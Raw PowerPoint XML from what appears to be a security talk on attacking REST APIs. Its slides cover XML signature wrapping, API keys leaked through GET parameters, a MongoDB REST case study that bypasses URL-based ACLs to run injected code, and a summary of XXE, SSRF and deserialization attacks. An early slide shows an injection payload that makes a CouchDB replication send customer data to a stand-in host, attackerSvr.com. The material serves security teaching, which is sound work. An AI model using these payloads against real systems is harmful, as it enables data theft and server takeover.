              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>{\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>fullName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\”:\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X\”, \”source\”:\”customers\”, \”target\”:\”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackerSvr.com:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>corpData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\”}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker provides:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>../_replicate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>source”:”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>customers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>target”:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attackerSvr.com:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>corpData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155632958"/>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1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Reliance on incorrectly implemented protocols (SAML, XML Signature, XML Encryption, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="8686800" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SAML, XML Signature, XML Encryption can be subverted using wrapping based attacks.*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>How to Break XML Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tibor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Juraj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Somorovsky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>On Breaking SAML: Be Whoever You Want to Be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Juraj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Somorovsky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Andreas Mayer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jorg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Schwenk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Marco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kampmann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Meiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Jensen, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>How To Break XML Signature and XML Encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Juraj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Somorovsky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (OWASP Presentation)  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1593062016"/>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1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorrect assumptions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>REST application behavior</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Guidance related to REST implementation of security make take into account adhering to REST principles over security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>REST provides for dynamic URLs and dynamic resource allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2642470380"/>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1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorrect assumptions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>REST application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>behavior (Example 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>According to many REST authentication guides on the Internet, an “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apiKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” passed as a GET parameter is the best way to keep track of authenticated users with stateless sessions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3340730295"/>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1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorrect assumptions of application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>REST behavior (Example 1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>According to many REST authentication guides on the Internet, an “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apiKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” passed as a GET parameter is the best way to keep track of authenticated users with stateless sessions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But HTTP GET Parameters are usually exposed in proxy logs, browser histories, and HTTP server logs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3593004693"/>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600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REST provides for dynamic URLs and dynamic resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allocation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example Case Study</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1828800"/>
            <a:ext cx="8686800" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You have an Mongo DB REST API which exposes two databases which can only be accessed at /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>realtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/* and /predictive/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are two ACLs which protect all access to each of these databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>web-resource-name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Realtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> User&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>web-resource-name&gt;      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>realtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>web-resource-name&gt;Predictive Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>User&lt;/web-resource-name&gt;      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>predicitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-pattern&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can anyone see the problem?  You should be able to own the server with as little disruption to the existing databases.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1503143198"/>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Example Case Study Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="914400"/>
            <a:ext cx="8686800" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The problem is not in the two databases.  The problem is that you are working with a REST API and resources are dynamic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So POST to the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to create a new database called test which is accessible at “/test”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	POST http://svr.com:27080/test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then POST the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>svr.com:27080/test/_cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>With the following body:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>={…, “$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reduce”:”function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> }” …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1215133359"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>REST Attacking Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="990600"/>
            <a:ext cx="8686800" cy="5135563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack serialization the exposed XML/JSON interfaces to execute remote code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>proxied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> requests to backend systems using Extended HPPP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use XXE/SSRF to read local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files, execute arbitrary code, or port scan and attack other internal REST exposed applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look for other internal REST APIs through HATEOAS links in XML responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By-pass authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
